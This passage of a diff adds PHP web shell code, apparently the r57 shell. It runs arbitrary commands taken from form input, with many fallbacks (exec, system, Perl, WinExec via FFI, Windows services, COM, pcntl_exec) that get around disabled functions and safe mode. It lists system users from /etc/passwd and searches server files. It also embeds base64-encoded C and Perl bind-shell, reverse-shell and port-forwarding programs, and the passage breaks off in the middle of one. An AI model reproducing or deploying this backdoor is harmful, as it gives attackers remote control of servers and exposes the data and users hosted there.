+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+
+if(isset($_GET['users'])) 
+ { 
+ if(!$users=get_users('/etc/passwd')) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
+ else 
+  { 
+  echo '<center>';
+  foreach($users as $user) { echo $user."<br>"; }
+  echo '</center>';
+  }
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); 
+ }
+
+
+if (!empty($_POST['dir'])) { if(@function_exists('chdir')){@chdir($_POST['dir']);} else if(@function_exists('chroot')){ @chroot($_POST['dir']);}; }
+if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];}
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
+if(empty($dir))
+ { 
+ $os = getenv('OS');
+ if(empty($os)){ $os = @php_uname(); } 
+ if(empty($os)){ $os ="-"; $unix=1; } 
+ else
+    {
+    if(@eregi("^win",$os)) { $unix = 0; }
+    else { $unix = 1; }
+    }
+ }
+
+
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+	
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= (!$unix)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
+  die(); 
+  }                                                          
+
+
+/*if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }*/
+if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }else{$safe_mode = 0;}
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+
+
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+
+
+function ex($cfe)
+{global $unix,$tempdir;
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(@function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(@function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(@function_exists('system'))
+   {
+    @ob_start();
+    @system('$cfe');
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@function_exists('popen') && @is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   if(@function_exists('fread') && @function_exists('feof')){
+    while(!@feof($f)) { $res .= @fread($f,1024); }
+   }else if(@function_exists('fgets') && @function_exists('feof')){
+    while(!@feof($f)) { $res .= @fgets($f,1024); }
+   }
+   @pclose($f);
+  }
+  elseif(@function_exists('proc_open') && @is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes)))
+  {
+   $res = "";
+   if(@function_exists('fread') && @function_exists('feof')){
+    while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);}
+   }else if(@function_exists('fgets') && @function_exists('feof')){
+    while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);}
+   }
+   @proc_close($f);
+  }
+ }else{$res = safe_ex($cfe);}
+ return htmlspecialchars($res);
+}
+
+
+
+
+function safe_ex($cfe)
+{global $unix,$tempdir;
+ $res = '';
+ if (!empty($cfe))
+ {
+   if(extension_loaded('perl')){
+     @ob_start();
+     $safeperl=new perl();
+     $safeperl->eval("system('$cfe')");
+     $res = @ob_get_contents();
+     @ob_end_clean();
+   }
+   elseif(!$unix && extension_loaded('ffi')) 
+   {
+     $output=$tempdir.uniqid('NJ');
+     $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
+     if(!@function_exists('escapeshellarg')){$res=$api->WinExec("cmd.exe /c $cfe >\"$output\"",0);}
+     else{$res=$api->WinExec("cmd.exe /c ".@escapeshellarg($cfe)." >\"$output\"",0);}
+     while(!@file_exists($output))sleep(1);
+     $res=moreread($output);
+     @unlink($output);
+   }
+   elseif(!$unix && extension_loaded('win32service'))
+   {
+     $output=$tempdir.uniqid('NJ');
+     $n_ser=uniqid('NJ');
+     if(!@function_exists('escapeshellarg'))
+     {@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\\windows\\system32\\cmd.exe','params'=>"/c $cfe >\"$output\""));}
+     else{@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\\windows\\system32\\cmd.exe','params'=>"/c ".@escapeshellarg($cfe)." >\"$output\""));}
+     @win32_start_service($n_ser);
+     @win32_stop_service($n_ser);
+     @win32_delete_service($n_ser);
+     while(!@file_exists($output))sleep(1);
+     $res=moreread($output);
+     @unlink($output);
+   }
+   elseif(!$unix && extension_loaded("win32std"))
+   {
+     $output=$tempdir.uniqid('NJ');
+     if(!@function_exists('escapeshellarg')){@win_shell_execute('..\..\..\..\..\..\..\windows\system32\cmd.exe /c '.$cfe.' > "'.$output.'"');}
+     else{@win_shell_execute('..\..\..\..\..\..\..\windows\system32\cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');}
+     while(!@file_exists($output))sleep(1);
+     $res=moreread($output);
+     @unlink($output);
+   }
+   elseif(!$unix)
+   {
+     $output=$tempdir.uniqid('NJ');
+     $suntzu = new COM("WScript.Shell"); 
+     if(!@function_exists('escapeshellarg')){$suntzu->Run('c:\windows\system32\cmd.exe /c '.$cfe.' > "'.$output.'"');}
+     else{$suntzu->Run('c:\windows\system32\cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');}
+     $res=moreread($output);
+     @unlink($output);
+   }
+   elseif(@function_exists('pcntl_exec') && @function_exists('pcntl_fork'))
+   {
+    $res = '[~] Blind Command Execution via [pcntl_exec]\n\n';
+    $output=$tempdir.uniqid('pcntl');
+    $pid = @pcntl_fork();
+    if ($pid == -1) {
+     $res .= '[-] Could not children fork. Exit';
+    } else if ($pid) {
+         if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';}
+         else {$res .= '[-] Error. Command incorrect.';}
+    } else {
+         $cfe = array(" -e 'system(\"$cfe > $output\")'");
+         if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0);
+         if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0);
+         die();
+    }
+    $res=moreread($output);
+    @unlink($output);
+   }
+/*   elseif(1)
+   {
+     
+   }
+*/
+ }
+ return htmlspecialchars($res);
+}
+
+
+function get_users($filename)
+{
+  $users = $rows = array();
+  $rows=@explode("\n",moreread($filename));
+  if(!$rows[0]){$rows=@explode("\n",readzlib($filename));}
+  if(!$rows[0]) return 0;
+  foreach ($rows as $string)
+   {
+   $user = @explode(":",trim($string));
+   if(substr($string,0,1)!='#') array_push($users,$user[0]);
+   }
+  return $users; 
+}
+function err($n,$txt='')
+{
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>';
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
+if(!empty($txt)) { echo " $txt"; }
+echo '</b></div></font></td></tr></table>';
+return null;
+}
+function perms($mode)
+{
+if (!$GLOBALS['unix']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value,$checked=0)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\"";
+ if($checked) $ret .= " checked";
+ return $ret.">";
+}
+function which($pr)
+{
+$path = '';
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return false; }
+}
+function ps($pr)
+{global $unix;
+$path = '';
+if($unix){$path = ex("ps -aux | grep $pr | grep -v 'grep'");}
+else{$path = ex("tasklist | findstr \"$pr\"");}
+if(!empty($path)) { return $path; } else { return false; }
+}
+function locate($pr)
+{
+$path = '';
+$path = ex("locate $pr");
+if(!empty($path)) { return $path; } else { return false; }
+}
+function cf($fname,$text)
+{
+ if(!morewrite($fname,@base64_decode($text))){err(0);};
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
